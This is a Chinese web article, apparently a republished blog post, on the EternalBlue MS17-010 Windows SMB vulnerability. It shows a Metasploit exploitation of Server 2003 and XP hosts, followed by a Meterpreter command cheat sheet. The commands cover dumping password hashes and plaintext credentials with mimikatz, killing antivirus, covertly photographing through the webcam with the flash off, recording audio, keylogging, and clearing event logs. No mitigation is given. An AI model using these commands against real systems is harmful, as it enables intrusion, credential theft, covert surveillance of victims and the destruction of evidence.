这个席卷全球的漏洞,你的电脑中招了吗

发表于:2019-4-29 10:06

字体: | 上一篇 | 下一篇 | 我要投稿

 作者:safe6安全    来源:今日头条

#
漏洞
分享:
  前言
  即使过去两年了,但是国内还是有很多电脑没有修复。这个漏洞攻击成本低,危害巨大还是不容小觑的。
  爆发
  2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
 

  经历过的朋友或许对这图不陌生
  攻击过程
  本次利用神器MSF演示
  目前MSF下利用ms17-010模块:
  本次主要exploit/windows/smb/ms17_010_psexec模块
  启动msf
  
  测试Microsoft(R) Windows(R) Server 2003, Enterprise Edition
  设置如下
  
  直接run
 
  很轻松就拿下了这台03
  测试Microsoft Windows XP Professional
  

  一样很轻松
  win10,win7就不测试
  试一试其它命令
  命令
  读wifi密码:bgrun post/windows/wlan/wlan_profile(失败进交互命令行执行netsh wlan show profiles)
  读系统明文密码:wdigest (需加载mimikatz模块)
  
  杀掉杀毒软件:bgrun killav
  
  查看有没有摄像头:webcam_list
  启动摄像头:bgrun webcam
  启动摄像头拍摄一张照片但不打开闪光灯:webcam_snap -i 1 -v false
  启动声音录制:bgrun sound_recorder
  keyscan_start:开启键盘记录功能
  keyscan_dump:显示捕捉到的键盘记录信息
  keyscan_stop:停止键盘记录功能
  获取密码哈希值:bgrun hashdump
  meterpreter > load mimikatz #加载mimikatz
  meterpreter > msv #获取hash值
  meterpreter > kerberos #获取明文
  meterpreter >ssp #获取明文信息
  meterpreter > wdigest #获取系统账户信息
  meterpreter >mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示
  meterpreter >mimikatz_command -f hash:: #获取目标 hash
  meterpreter > mimikatz_command -f samdump::hashes
  meterpreter > mimikatz_command -f sekurlsa::searchPasswords
  启动vnc连接:bgrun vnc
  对目标系统桌面进行截屏:screenshot
  清除操作日志:clearev
  下载文件:download d:safe6.txt
  上传文件:upload a.txt d:
  显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息:sysinfo
  执行命令:execute -f notepad.exe

      上文内容不用于商业目的,如涉及知识产权问题,请权利人联系博为峰小编(021-64471599-8017),我们将立即处理。
《2023软件测试行业现状调查报告》独家发布~

关注51Testing

联系我们

快捷面板 站点地图 联系我们 广告服务 关于我们 站长统计 发展历程

法律顾问:上海兰迪律师事务所 项棋律师
版权所有 上海博为峰软件技术股份有限公司 Copyright©51testing.com 2003-2024
投诉及意见反馈:webmaster@51testing.com; 业务联系:service@51testing.com 021-64471599-8017

沪ICP备05003035号

沪公网安备 31010102002173号